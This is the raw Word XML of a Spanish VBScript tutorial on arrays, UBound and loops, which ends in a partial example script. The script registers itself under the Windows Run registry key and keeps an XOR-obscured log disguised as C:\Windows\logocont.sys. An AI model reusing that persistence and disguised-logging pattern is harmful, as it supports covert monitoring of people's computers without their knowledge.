        <w:t>Para que Ubound nos devuelva el número que indicas las Y, debemos añadir un argument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Msgbox “La Matriz tiene </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>“  &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubound(MiMatriz,1) * Ubound(MiMatriz,2) &amp; “ posicion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hay que escribir </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>NombreMatriz,Numero</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, donde </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Numero</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede ser en </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matrices</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 o 2, según queramos el primer o el segundo numero que hemos usado al declarar la Matriz. Si lo omitimos, VBScript le da el valor por defecto 1, y por eso, en los ejemplos anteriores salían las X. De esta forma podemos usar también en un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Array simple </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>(Array,1)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para obtener su númer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queremos, de esta forma, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>recorrer toda una fila</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las X, haríamos un bucle for parecido al siguiente, poniendo en miMatriz(x,1) el numero de la fila a recorrer (que dependerá de las que existan):</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miMatriz(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3,2)</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For x=0 To UBound(miMatriz)</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miMatriz(x,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5</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Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2742"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2010410" cy="789940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10880" name="Picture 10880"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10880" name="Picture 10880"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2010410" cy="78994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recorreríamos toda la fila 1, pudiendo recorrer la 0 o la 2 cambiando el valor de 1 (a 0 o 2). En el caso de querer </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>recorrer una columna</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, el bucle sería:</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miMatriz(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3,2)</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For x=0 To UBound(miMatriz,2)</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miMatriz(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>1,x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)=5</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Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3170"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1466850" cy="933450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10891" name="Picture 10891"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="10891" name="Picture 10891"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1466850" cy="93345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form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de Nuevo, cambiaríamos 1 por la columna que quisiésemos. Por último, para recorrer el bucle entero crearíamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dos bucles For</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de la siguiente forma:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="13"/>
        <w:ind w:left="93" w:right="5234"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For x=0 to UBound(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">miMatriz)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> For y=0 to UBound(miMatriz,2)</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miMatriz(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>x,y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)=5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="93" w:right="7491"/>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Next Next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sí da igual el tamaño de la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Matriz</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pues recorrería todos y cada uno de sus elementos sin excepción.</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ultimo sobre Arrays importante, es que no solo existen los típos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Array Simpl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Matriz</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, hay </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Arrays de tres dimensiones y más aún</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</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MiArray(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2,4,3)</w:t>
      </w:r>
    </w:p>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norma general para todos los demás casos, que suelen ser </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>menos comunes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, decir que el numero de elementos es la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>multiplicación de los números +1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se usen al declararlas (en este ejemplo sería 60 ya que 3*5*4=60), que se usan de forma similar a los otros dos tipos, y que la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>función Ubound</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, en su </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>segundo argumento</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> puede tener un 3, 4 o el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>numero que queramos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, para obtener así el dato que necesitemos. Pero no voy a pararme a explicar ahora ejemplos ya tan complejos; simplemente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>asociad las ideas aprendidas a más dimensiones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="42"/>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Ejemplos y Códigos</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 bueno, ver en conjunto algún script ya hecho y analizarlo para comprender su funcionamiento. Con este objetivo esta realizada esta parte, en la que expondré y explicaré algunos códigos de scripts enteros ya:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="74" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8550"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="10416"/>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On Error Resume Nex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a= </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CreateObject(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"WScript.Shell")</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b= </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CreateObject(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>"Scripting.FileSystemObject")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="6634"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unction encriptar(d) For e = 1 To Len(d)</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encriptar = encriptar &amp; </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Chr(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Asc(Mid(d,e, 1)) Xor 3)</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Nex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Function</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="719"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c1 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a.regRead</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> ("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ContInicio") If c1 = "C:\Windows\cuenta.vbs" then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1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2 = MsgBox ("Este Pc tiene instalado el Contador 1.2" &amp; vbcrlf &amp; "¿Quieres ver el registro del Contador?" &amp; vbcrlf &amp; "(Esta operacion puede tardar varios segundos)",36,"Contador 1.2") If c2=6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c3 = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>b.GetFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("C:\Windows\logocont.sys")</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c4 = c</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.OpenAsTextStream</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(1, 0)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="627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coder = c</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4.ReadAll</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
